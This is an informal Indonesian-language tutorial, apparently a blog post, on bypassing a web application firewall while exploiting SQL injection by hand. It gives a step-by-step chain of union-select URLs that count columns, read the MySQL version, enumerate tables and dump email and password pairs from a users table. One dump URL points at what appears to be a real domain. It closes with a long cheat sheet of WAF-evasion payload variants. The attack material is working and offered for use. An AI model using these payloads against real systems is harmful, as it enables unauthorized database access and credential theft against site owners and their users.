assalamualaikum
kali ini tentang bagaimana membypass filter waf pada bug sqli
secara manual, kenapa manual soal nya sqlmap nya lg bobo :P
okay langsung aja
target:
http://www.target.com/ebookcontents.php?id=95'
secara manual, kenapa manual soal nya sqlmap nya lg bobo :P
okay langsung aja
target:
http://www.target.com/ebookcontents.php?id=95'
yaps bug sqli
kemudian lanjut dah pake perintah "order by" , cari kolom nya
http://www.target.com/ebookcontents.php?id=95 order by 7--
Unknown column '7' in 'order clause'
Unknown column '7' in 'order clause'
lanjut sampe dapat :D
ternyata ada 6 kolom
http://www.target.com/ebookcontents.php?id=95 order by 6--
terus cari angka ajaib nya dengan perintah "union select"
http://www.target.com/ebookcontents.php?id=95 union select 1,2,3,4,5,6--
dan hasil nya Not Acceptable kemungkinan ada waf, mari kita coba bypass
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,3,4,5,6--
ew bisa di buka ternyata, disini saya memilih angka 3 :D
coba kita liat versi mysql berapa dia
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,version(),4,5,6--
dia pake versi 5.5.34-cll
lanjut dah kita liat isi database nya dengan perintah
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,group_concat(table_name)(0x3c62723e,table_name)*/,4,5,6 from information_schema.tables where table_schema=database()--
dan hasil nya Not Acceptable, mungkin harus alay kali yah syntax nya, kita coba dengan cara ini
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(0x3c62723e,table_name)*/,4,5,6 +from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
dan hasil nya
heheh bisa dah, ada banyak isi "database" nya, mari kita fokus pada database "users"
masukkan perintah ini
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(Group_Concat(table_name))*/,4,5,6 from information_schema.tables where table_schema=database()--
hemm banyak table nya uyy,
disini saya memilih table "users"
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!column_name*/)),4,5,6 from /*!information_schema*/.columns where /*!table_name*/=0x7573657273--+
dan hasil nya ada id,email,password,date
mari kita dump :P
http://www.trnres.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!email,0x3a,password*/)),4,5,6/*!from*/ /*!users*/
dan hasil nya
bonus dah
tips dan trik
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--
And
UNION SELECT Bypassing ::
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
after id no. like id=1 +/*!and*/+1=0
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
ok semoga bermanfaat
